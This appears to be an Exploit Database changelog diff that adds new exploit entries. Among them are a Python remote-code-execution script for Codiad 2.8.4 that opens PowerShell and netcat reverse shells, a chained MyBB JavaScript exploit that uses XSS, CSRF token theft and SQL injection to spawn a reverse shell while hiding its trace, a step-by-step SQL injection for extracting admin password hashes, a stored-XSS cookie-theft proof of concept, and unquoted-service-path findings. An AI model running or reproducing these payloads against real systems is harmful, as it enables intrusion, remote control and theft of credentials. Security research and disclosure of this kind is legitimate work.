DB: 2021-03-24

8 changes to exploits/shellcodes

Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path
ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path
MyBB 1.8.25 - Poll Vote Count SQL Injection
Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS
Codiad 2.8.4 - Remote Code Execution (Authenticated)

exploits/multiple/webapps/49705.py

@@ -0,0 +1,150 @@
+# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)
+# Discovery by: WangYihang
+# Vendor Homepage: http://codiad.com/
+# Software Links : https://github.com/Codiad/Codiad/releases
+# Tested Version: Version: 2.8.4
+# CVE: CVE-2018-14009
+
+
+#!/usr/bin/env python
+# encoding: utf-8
+import requests
+import sys
+import json
+import base64
+session = requests.Session()
+def login(domain, username, password):
+    global session
+    url = domain + "/components/user/controller.php?action=authenticate"
+    data = {
+        "username": username,
+        "password": password,
+        "theme": "default",
+        "language": "en"
+    }
+    response = session.post(url, data=data, verify=False)
+    content = response.text
+    print("[+] Login Content : %s" % (content))
+    if 'status":"success"' in content:
+        return True
+def get_write_able_path(domain):
+    global session
+    url = domain + "/components/project/controller.php?action=get_current"
+    response = session.get(url, verify=False)
+    content = response.text
+    print("[+] Path Content : %s" % (content))
+    json_obj = json.loads(content)
+    if json_obj['status'] == "success":
+        return json_obj['data']['path']
+    else:
+        return False
+def base64_encode_2_bytes(host, port):
+    payload = '''
+    $client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__);
+    $stream = $client.GetStream();
+    [byte[]]$bytes = 0..255|%{0};
+    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
+        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+        $sendback = (iex $data 2>&1 | Out-String );
+        $sendback2  = $sendback + "PS " + (pwd).Path + "> ";
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+        $stream.Write($sendbyte,0,$sendbyte.Length);
+        $stream.Flush();
+    }
+    $client.Close();
+    '''
+    result = ""
+    for i in payload.replace("__HOST__", host).replace("__PORT__", str(port)):
+        result += i + "\x00"
+    return base64.b64encode(result.encode()).decode().replace("\n", "")
+def build_powershell_payload(host, port):
+    preffix = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "
+    return preffix + base64_encode_2_bytes(host, port).replace("+", "%2b")
+def exploit(domain, username, password, host, port, path, platform):
+    global session
+    url = domain + \
+        "components/filemanager/controller.php?type=1&action=search&path=%s" % (
+            path)
+    if platform.lower().startswith("win"):
+        # new version escapeshellarg
+        # escapeshellarg on windows will quote the arg with ""
+        # so we need to try twice
+        payload = '||%s||' % (build_powershell_payload(host, port))
+        payload = "search_string=Hacker&search_file_type=" + payload
+        headers = {
+            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
+        response = session.post(url, data=payload, headers=headers, verify=False)
+        content = response.text
+        print(content)
+        # old version escapeshellarg
+        payload = '%%22||%s||' % (build_powershell_payload(host, port))
+        payload = "search_string=Hacker&search_file_type=" + payload
+        headers = {
+            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
+        response = session.post(url, data=payload, headers=headers, verify=False)
+        content = response.text
+        print(content)
+    else:
+        # payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''
+        payload = '"%%0Anc %s %d|/bin/bash %%23' % (host, port)
+        payload = "search_string=Hacker&search_file_type=" + payload
+        headers = {
+            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
+        response = session.post(url, data=payload, headers=headers, verify=False)
+        content = response.text
+        print(content)
+def promote_yes(hint):
+    print(hint)
+    while True:
+        ans = input("[Y/n] ").lower()
+        if ans == 'n':
+            return False
+        elif ans == 'y':
+            return True
+        else:
+            print("Incorrect input")
+def main():
+    if len(sys.argv) != 7:
+        print("Usage : ")
+        print("        python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
+        print("        python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0]))
+        print("Example : ")
+        print("        python %s http://localhost/ admin admin 8.8.8.8 8888 linux" % (sys.argv[0]))
+        print("        python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows" % (sys.argv[0]))
+        print("Author : ")
+        print("        WangYihang <wangyihanger@gmail.com>")
+        exit(1)
+    domain = sys.argv[1]
+    username = sys.argv[2]
+    password = sys.argv[3]
+    host = sys.argv[4]
+    port = int(sys.argv[5])
+    platform = sys.argv[6]
+    if platform.lower().startswith("win"):
+        print("[+] Please execute the following command on your vps: ")
+        print("nc -lnvp %d" % (port))
+        if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"):
+            exit(1)
+    else:
+        print("[+] Please execute the following command on your vps: ")
+        print("echo 'bash -c \"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\"' | nc -lnvp %d" % (host, port + 1, port))
+        print("nc -lnvp %d" % (port + 1))
+        if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"):
+            exit(1)
+    print("[+] Starting...")
+    if not login(domain, username, password):
+        print("[-] Login failed! Please check your username and password.")
+        exit(2)
+    print("[+] Login success!")
+    print("[+] Getting writeable path...")
+    path = get_write_able_path(domain)
+    if path == False:
+        print("[+] Get current path error!")
+        exit(3)
+    print("[+] Writeable Path : %s" % (path))
+    print("[+] Sending payload...")
+    exploit(domain, username, password, host, port, path, platform)
+    print("[+] Exploit finished!")
+    print("[+] Enjoy your reverse shell!")
+if __name__ == "__main__":
+    main()

exploits/php/webapps/49696.js

@@ -5,19 +5,16 @@
 # Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
 # CVE: CVE-2021-27889, CVE-2021-27890
 
-Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
+# Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums 
+# The exploit requires the target administrator to have a valid ACP session.
+# Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ
+# Guide:
 
-The exploit requires the target administrator to have a valid ACP session.
-
-Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ
-
-Guide:
-
-1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.
+1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. 
 
 Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.
 
-document.write('<script src=http://localhost:8000/second_stage.js></script>');
+    document.write('<script src=http://localhost:8000/second_stage.js></script>');
 
 2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.
 
@@ -25,193 +22,202 @@ You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/
 
 3) Put the resulting encoded payload in the nested autourl vulnerability vector:
 
-[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]
+    [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]
 
 4) The final payload should look like this:
 
-[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]
+    [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]
 
 5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.
 Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.
 
 After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.
 
-6) Enjoy your RCE! For educational purposes only.
+6) Enjoy your RCE! For educational purposes only. 
 
-*/
 
-constREVERSE_SHELL_IP = "localhost";
-constREVERSE_SHELL_PORT = 5554;
+const REVERSE_SHELL_IP = "localhost";
+const REVERSE_SHELL_PORT = 5554;
 
-constPAYLOAD_XML_NAME = "payload";
-constPAYLOAD_XML_VERSION = "1821";
+const PAYLOAD_XML_NAME = "payload";
+const PAYLOAD_XML_VERSION = "1821";
 
-constXML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
+const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
+
+const SHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
+const SQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";
 
-constSHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
-constSQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";
 
 // Trigger the actual vulnerability, force cache reload.
 // Stage: Final
-functiontrigger() {
-varrequest = newXMLHttpRequest();
+function trigger() {
+    var request = new XMLHttpRequest();
 
-request.open('GET', '/index.php');
-request.send();
+    request.open('GET', '/index.php');
+    request.send();
 }
 
+
 // Poison the cache.
 // Stage: 6
-functionset_as_default(token, tid) {
+function set_as_default(token, tid) {
 
-varrequest = newXMLHttpRequest();
+    var request = new XMLHttpRequest();
 
-request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);
+    request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);
 
-request.onload = function() { trigger(); };
+    request.onload = function() { trigger(); };
 
-request.send();
+    request.send();
 }
 
 // Get the TID of the downloaded theme payload
 // Stage: 5
-functionget_payload_tid(token) {
-varrequest = newXMLHttpRequest();
+function get_payload_tid(token) {
+    var request = new XMLHttpRequest();
 
-request.open('GET', '/admin/index.php?module=style-themes');
+    request.open('GET', '/admin/index.php?module=style-themes');
 
-request.responseType = "document";
+    request.responseType = "document";
 
-request.onload = function() {
+    request.onload = function() { 
+        
+        var response = request.response;
 
-varresponse = request.response;
+        var aTags = response.getElementsByTagName("a");
+        var searchText = "payload";
+        var found;
 
-varaTags = response.getElementsByTagName("a");
-varsearchText = "payload";
-varfound;
+        for (var i = 0; i < aTags.length; i++) {
+            if (aTags[i].textContent == searchText) {
+                found = aTags[i];
+                break;
+            }
+        }
 
-for (vari = 0; i < aTags.length; i++) {
-if (aTags[i].textContent == searchText) {
-found = aTags[i];
-break;
-}
-}
+        var href = found.getAttribute("href");
 
-varhref = found.getAttribute("href");
+        var urlParams = new URLSearchParams(href);
 
-varurlParams = newURLSearchParams(href);
+        var tid = urlParams.get("tid");
+    
 
-vartid = urlParams.get("tid");
+        set_as_default(token, tid); 
+    };
 
-set_as_default(token, tid);
-};
-
-request.send();
+    request.send();
 
 }
 
+
 // We pass the actual request to upload the template exploiting the second link of the exploit chain
 // Stage: 4
-functionupload_template(token) {
+function upload_template(token) {
 
-varrequest = newXMLHttpRequest();
+    var request = new XMLHttpRequest();
 
-request.open('POST', '/admin/index.php?module=style-themes&action=import');
+    request.open('POST', '/admin/index.php?module=style-themes&action=import');
 
-vardata = newFormData();
+    var data = new FormData();
 
-data.append('my_post_key', token);
-data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
-data.append('import', 0);
-data.append('url', '');
-data.append('tid', '1');
-data.append('name', "payload");
-data.append("version_compat", 1);
-data.append("import_stylesheets", 1);
-data.append("import_templates", 1);
+    data.append('my_post_key', token);
+    data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
+    data.append('import', 0);
+    data.append('url', '');
+    data.append('tid', '1');
+    data.append('name', "payload");
+    data.append("version_compat", 1);
+    data.append("import_stylesheets", 1);
+    data.append("import_templates", 1);
 
-request.onload = function() {
-// After uploading the template, set it as default to poison the cache
-get_payload_tid(token)
-};
+    request.onload = function() { 
+        // After uploading the template, set it as default to poison the cache
+        get_payload_tid(token)
+    };
 
-request.send(data);
+
+    request.send(data);
 }
 
+
 // Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
 // Stage: 3
-functionbuild_payload() {
-varxmlDom = document.implementation.createDocument("", "", null);
+function build_payload() {
+    var xmlDom = document.implementation.createDocument("", "", null);
+    
+    var theme = xmlDom.createElement("theme");
+    theme.setAttribute("name", PAYLOAD_XML_NAME);
+    theme.setAttribute("version", PAYLOAD_XML_VERSION);
 
-vartheme = xmlDom.createElement("theme");
-theme.setAttribute("name", PAYLOAD_XML_NAME);
-theme.setAttribute("version", PAYLOAD_XML_VERSION);
+    var properties = xmlDom.createElement("properties");
+    theme.appendChild(properties);
 
-varproperties = xmlDom.createElement("properties");
-theme.appendChild(properties);
+    var template_set = xmlDom.createElement("templateset");
+    template_set.innerHTML = SQL_PAYLOAD;
+    properties.appendChild(template_set);
 
-vartemplate_set = xmlDom.createElement("templateset");
-template_set.innerHTML = SQL_PAYLOAD;
-properties.appendChild(template_set);
+    xmlDom.appendChild(theme);
 
-xmlDom.appendChild(theme);
+    var serialized = new XMLSerializer().serializeToString(xmlDom);
 
-varserialized = newXMLSerializer().serializeToString(xmlDom);
-
-varresult = XML_PROLOG + serialized;
-varfile = newFile([result], PAYLOAD_XML_NAME);
-
-returnfile;
+    var result = XML_PROLOG + serialized;
+    var file = new File([result], PAYLOAD_XML_NAME);
+    
+    return file;
 }
 
-// Acquire the anti-CSRF token
+
+// Acquire the anti-CSRF token 
 // Stage: 2
-functionacquire_token(request) {
+function acquire_token(request) {
 
-varresponse = request.response;
-vartoken = response.getElementsByName("my_post_key")[0].value;
+    var response = request.response;
+    var token = response.getElementsByName("my_post_key")[0].value;
 
-if(token == null) {
-/* ACP Session either expired or wasn't established to begin with */
-return;
+    if(token == null) { 
+        /* ACP Session either expired or wasn't established to begin with */
+        return;
+    }
+
+    // We have acquired the anti-CSRF token now.
+    upload_template(token);
 }
 
-// We have acquired the anti-CSRF token now.
-upload_template(token);
-}
 
 // ACP Code Execution
 // Stage: 1
-functionexec_acp() {
+function exec_acp() {
+    
+    var request = new XMLHttpRequest();
 
-varrequest = newXMLHttpRequest();
+    request.open('GET', 'admin/index.php?module=style-themes&action=import');
+    request.responseType = "document";
 
-request.open('GET', 'admin/index.php?module=style-themes&action=import');
-request.responseType = "document";
+    request.onload = function() { 
+        acquire_token(request); 
+    };
 
-request.onload = function() {
-acquire_token(request);
-};
-
-request.send();
+    request.send();
 }
 
+
 // We hide the payload, to raise less suspicions
 // Stage: 0
-functionhide() {
+function hide() {
 
-vargetAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");
-
-getAll.forEach(element=> {
-varpNode = element.parentNode.innerText="lmao whatever you say";
-});
+    var getAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");
 
+    getAll.forEach(element => {
+        var pNode = element.parentNode.innerText="lmao whatever you say";
+    });
+    
 }
 
 // Entry point of the exploit
-functionstart() {
-hide();
-exec_acp();
+function start() {
+    hide();
+    exec_acp();  
 }
 
+
 start();

exploits/php/webapps/49699.txt

@@ -0,0 +1,71 @@
+# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection
+# Exploit Author: SivertPL (kroppoloe@protonmail.ch)
+# Date: 20.03.2021
+# Description: Lack of sanitization in the "votes[]" parameter in "Edit Poll" causes a second-order semi-blind SQL Injection that is triggered when performing a "Move/Copy" operation on the thread.
+# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip
+# CVE: CVE-2021-27946
+
+References:
+
+    1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums 
+    2) https://vuldb.com/?id.171307
+    3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch 
+
+In order to trigger the vulnerability, you must have permission to edit polls. 
+Moderators and administrators can usually do it, but in some configurations regular users can do it as well.
+
+In case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.
+
+Otherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary
+injections automatically, and send the resulting hashes to your server.
+
+This is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of 
+a very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector.
+
+This vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.
+In such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).
+
+Guide:
+
+1) Make a thread with a public poll, with multiple choices.
+
+2) Vote on at least one choice.
+
+3) Go to the "Edit poll" section of the poll.
+
+4) Place the following payload in the "vote count" input (any entry within the votes[] parameter in the resulting POST request).
+
+    1','2',ascii((select version())),'0','0','1','1') -- -a
+
+5) Save the poll.
+
+6) Perform a "Move/Copy" operation on the thread, moving it to a different forum, or making a copy in the same forum.
+
+This is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.
+
+7) Go to the copied/moved version of the thread (you should be redirected there automatically).
+
+8) Go to the "Show Results" section of the poll.
+
+9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. 
+
+Since this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).
+Other parameters in the INSERT query that we are injecting into are either too small, or unfeasible. 
+Unsigned integer provides enough space to extract required data when enough requests are made.
+
+In this case, the number is the ASCII code of the first character of the result of the injected select version() query.
+This way we can transfer the output through this covert channel, one character at a time.
+
+In order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.
+
+1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 2, 1))),'0','0','1','1') -- -a
+1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 3, 1))),'0','0','1','1') -- -a
+1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 4, 1))),'0','0','1','1') -- -a
+1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 5, 1))),'0','0','1','1') -- -a
+
+... etc.
+
+This will send the ASCII codes of every char of the hashed password through the integer covert channel.
+
+
+10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.

exploits/php/webapps/49700.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS
+# Exploit Author: Jitendra Kumar Tripathi
+# Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code
+# Version: 1
+# Tested on Windows 10 + Xampp 8.0.3
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Customer Details
+
+*Steps to reproduce:*
+1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side.
+2: Add the new customer and then add the payload <script>alert(document.cookie)</script>in Customer Name parameter and click on save button. Post Saved successfully.
+3: Now, XSS will get stored and trigger every time when you click view customer and the attacker can steal authenticated users' cookies.

exploits/windows/local/49701.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path
+# Dicovery by: Ekrem Can Kök
+# Discovery Date: 2021-03-22
+# Vendor Homepage: https://www.hirezstudios.com
+# Version: 5.1.6.3
+# Tested on: Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\" | findstr /i "HiPatchService" | findstr /i /v """
+
+Hi-Rez Studios Authenticate and Update Service HiPatchService C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe Auto
+
+# Service info:
+
+C:\>sc qc "HiPatchService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: HiPatchService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Hi-Rez Studios Authenticate and Update Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

exploits/windows/local/49702.txt

@@ -0,0 +1,25 @@
+# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
+# Exploit Author : SamAlucard
+# Exploit Date: 2021-03-22
+# Vendor :  ELAN Microelectronics
+# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
+# Vendor Homepage : http://www.emc.com.tw/
+# Tested on OS: Windows 8
+
+#This software installs EDTService.exe, version 11.10.2.1
+
+#Analyze PoC :
+==============
+C:\>sc qc ETDService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ETDService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Elan Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/49703.txt

@@ -0,0 +1,29 @@
+# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
+# Exploit Author : SamAlucard
+# Exploit Date: 2021-03-21
+# Software Version : ActivIdentity 8.2
+# Vendor Homepage : https://www.hidglobal.com/
+# Tested on OS: Windows 7 Pro
+
+# ActivIdentity was Acquired by HID Global in Octuber 2010
+
+#ActivClient is a desktop authentication software that uses smarts cards and readers
+# for enterprise, government and commercial establishments
+
+#Analyze PoC :
+==============
+
+C:\Users\DSAdsi>sc qc ac.sharedstore
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ac.sharedstore
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Common
+Files\ActivIdentity\ac.sharedstore.exe
+        GRUPO_ORDEN_CARGA  : SmartCardGroup
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : ActivIdentity Shared Store Service
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/49704.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path
+# Discovery by: Alan Mondragon
+# Discovery Date: 2021-03-23
+# Vendor Homepage: https://eventlogxp.com/
+# Software Links : https://eventlogxp.com/
+# Tested Version: Version: 4.9.3
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro 64 bits
+ 
+# Step to discover Unquoted Service Path: 
+ 
+C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+Elodea Event Collector Service                                                                                                     ElodeaEventCollectorService                             C:\Program Files (x86)\Elodea\EventCollector.exe                                                                                Auto
+
+
+C:\WINDOWS\system32>sc qc "ElodeaEventCollectorService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElodeaEventCollectorService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Elodea\EventCollector.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Elodea Event Collector Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+ 
+#Exploit:
+ 
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -11304,6 +11304,10 @@ id,file,description,date,author,type,platform,port
 49692,exploits/windows/local/49692.txt,"Winpakpro 4.8 - 'WPCommandFileService' Unquoted Service Path",2021-03-22,"Alan Mondragon",local,windows,
 49694,exploits/windows/local/49694.txt,"MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path",2021-03-22,"Ismael Nava",local,windows,
 49698,exploits/windows/local/49698.txt,"OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path",2021-03-22,"Johnny Tech",local,windows,
+49701,exploits/windows/local/49701.txt,"Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path",2021-03-23,"Ekrem Can Kök",local,windows,
+49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
+49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
+49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43880,4 +43884,7 @@ id,file,description,date,author,type,platform,port
 49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,
 49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",2021-03-22,"Nicholas Ferreira",webapps,php,
 49696,exploits/php/webapps/49696.js,"MyBB 1.8.25 - Chained Remote Command Execution",2021-03-22,SivertPL,webapps,php,
+49699,exploits/php/webapps/49699.txt,"MyBB 1.8.25 - Poll Vote Count SQL Injection",2021-03-23,SivertPL,webapps,php,
+49700,exploits/php/webapps/49700.txt,"Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS",2021-03-23,"Jitendra Kumar Tripathi",webapps,php,
+49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",2021-03-23,WangYihang,webapps,multiple,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,